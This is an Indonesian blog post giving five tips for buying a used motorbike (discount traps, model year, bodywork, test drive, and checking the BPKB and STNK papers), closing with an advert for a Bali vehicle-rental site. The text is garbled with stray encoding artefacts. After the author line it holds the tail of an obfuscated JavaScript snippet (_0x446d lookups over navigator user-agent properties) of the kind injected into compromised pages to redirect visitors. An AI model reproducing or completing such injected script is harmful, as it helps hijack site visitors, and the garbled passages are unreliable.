Panduan Membeli Motor Bekas.

Motor adalah kendaraan beroda dua, memiliki body yang simpel memungkinkan motor lincah saat berada di jalan raya. Bagi yang tinggal di perkotaan pun terbantu oleh motor karena bisa menerjang macet yang sering terjadi saat jam sibuk. Harga motorAi??baru sekarang lumayan tinggi sekitar diatas 15 jutaan. Selain penjualan motor baru yang terus meningkat, motor bekas juga banyak laku dipasaran. Membeli motor bekas memang susah-susah gampang. Disini penulis akan memberi tips jika pembaca ingin membeli motor bekas.

1. Kuatkan Tekad Membeli Motor Bekas

http://www.nagaswarafm.com/

Dalam membeli motor bekas, banyak sekali pilihannya. Mau membeli motor matic ataupun manual. Jangan mudah tergoda dengan harga yang miring karena belum tentu motor yang didiskon tadi akan bagus untuk dibeli. Seakan memaksa pembeli untuk membeli yang lagi diskon adalah suatu siasat agar barang tersebut cepat laku. Pasti ada sesuatu yang penjual inginkan agar motor tersebut cepat hilang di tempat penjualan mereka. Ingat saja pada tujuan utama anda saat ingin membeli motor dengan merek tertentu.

2. Periksa Tahun Pembuatan Motor

http://rideralam.com/

Umur kendaraan dari mereka “lahir” memang harus diperhitungkan. Memang jika kita melihat motor yang dijual bekas pasti motor keluaran lama atau motor jadul. Sebaiknya jangan terlalu mencari umur kendaraan yang sudah sangat tua untuk dijadikan kendaraan siap jalan kemana saja. Pasti banyak sparepart yang sudah tidak diproduksi lagi oleh perusahaan pembuatan motor tersebut karena “tua”. Namun jika memiliki keinginan membeli motor untuk koleksi memang boleh-boleh saja asalkan tetap bisa dibawa berkendara.

3. Periksa Body Motor

http://galeriotomotifmania.blogspot.co.id/

Body motor atau badan motor memang patut diperhitungkan saat membeli motor bekas. Banyak motor bekas mungkin sudah mengganti body nya dengan yang modifikasi. Ataupun diganti karena rusak saat pemakaian terdahulu. Pembeli bisa menanyakan apakah motor tersebut masih original ataupun modif. Tergantung selera mungkin pembeli memilih yang standar-standar saja ataupun modif. Tentunya semua itu agar saat terjadi kerusakan tidak bingung mencari penggantinya.

4. Minta lah Test DriveAi??

http://assets.intim.id/

Kita boleh mengajukan test drive kepada penjual agar lebih yakin membeli motor bekasnya. Cek kondisi dasar motor seperti rem, oli, lampu, pergantian gigi, dan gas. Sebaikanya berkeliling lah disekitaran tempat penjualan agar penjual masih bisa mengawasi kita. Tentunya penjual akan merasa was-was jika kita hilang dari pandangannya. Tapi ingat jangan terlalu lama ataupun sampai-sampai dibawa pulang. Berbahaya!!!

5. Periksa Kelengkapan Surat-SuratAi??

http://3.bp.blogspot.com/

Dalam membeli motor bekas yang paling penting adalalah kelengkapan surat-suratnya.Ai??Cek BPKB ( Buku Pemilik Kendaraan Bermotor ) danAi??STNKAi??(Surat Tanda Nomor Kendaraan). BPKBAi??berfungsi sebagai surat bukti kepemilikan kendaraan bermotor serta STNK berfungsi sebagai kelengkapan kendaraan bermotor ketika bergerak dijalan.Ai??Cek kedua surat tersebut jangan sampai ada yang aneh seperti nama yang berbeda antara BPKB dan STNK. karena STNK dan BPKB harus memiliki nama yang sama.

SetelahAi??semua dicek dan tidak ada masalah Ai??selamat anda telah menemukan motor bekas sesuai dengan keinginan anda. Jaga kondisi kendaraan bekas tersebut dan selalu patuhi rambu-rambu yang ada. Itulah beberapa panduan dalam membeli motor bekas. Namun jika anda lagi di Bali dan masih malas membeli motor serta ingin berpergian sewa kendaraan aja di www.sharetrans.idAi??tempat sewa kendaraan dengan harga terjangkau dan yang pasti gak pake ribetttt

Tim magang sharetrans
Yoga dan Rizky 46d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a reply:

Your email address will not be published.

Site Footer